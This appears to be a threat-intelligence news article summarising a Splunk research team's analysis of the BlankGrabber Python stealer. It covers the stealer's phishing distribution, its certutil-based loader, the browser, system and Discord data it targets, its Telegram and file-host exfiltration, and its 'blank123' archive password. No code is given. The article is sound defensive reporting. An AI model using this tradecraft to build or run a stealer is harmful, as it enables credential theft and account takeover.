Inside the Rapid Evolution of the BlankGrabber Stealer

A deep-dive analysis by the Splunk Threat Research Team (STRT) has shed light on BlankGrabber, a Python-based information stealer that is quickly becoming a favorite among cybercriminals for its modularity and low-profile operations.

Masquerading as everything from “cracked” software to legitimate GitHub utilities, BlankGrabber is a master of disguise designed to strip a victim’s digital life bare in seconds.

BlankGrabber doesn’t rely on complex exploits to enter a system; instead, it exploits human trust. It is primarily distributed through social engineering and phishing campaigns, often hiding in plain sight within Discord archives or weaponized GitHub repositories.

One particularly clever variant analyzed by STRT was found hosted on the Gofile[.]io file-sharing platform. This version utilizes a multi-stage loader that uses a built-in Windows utility, certutil.exe, to decode and install its malicious payload under the guise of a system certificate.

Once BlankGrabber establishes a foothold, its modular architecture allows it to pivot and target a wide array of sensitive information. Its primary mission is the exfiltration of:

• Browser Secrets: Saved credentials and session tokens that can grant attackers access to sensitive accounts without needing a password.
• System Metadata: Detailed information about the compromised host to help attackers plan further lateral movement.
• Discord Tokens: Allowing attackers to hijack accounts and spread the infection further through trusted communities.

“BlankGrabber is a Python-based information stealer engineered to exfiltrate sensitive data… the malware has gained notoriety for its modular architecture and rapid development cycle, designed specifically to maintain a low footprint and bypass traditional detection mechanisms,” the analysis explains.

BlankGrabber is remarkably flexible in how it sends stolen data back to its masters. STRT researchers identified two primary methods used by the malware to bypass network security:

• Telegram Bot C2: The malware often features an encoded Telegram bot ID embedded directly in its configuration, allowing it to send data over a legitimate communication protocol.
• Public Web Services: If standard channels are blocked, BlankGrabber can leverage public hosting platforms like Gofile.io and Anonfiles to upload archives of stolen data.

To ensure the stolen data remains inaccessible to security researchers, the malware often packages the harvested information into a password-protected archive. As seen in the technical breakdown, it uses hardcoded passwords such as blank123 to lock the collected data before exfiltration.

The most dangerous aspect of BlankGrabber is its “rapid development cycle”. The authors are constantly refining the code to stay one step ahead of antivirus signatures and behavioral detections.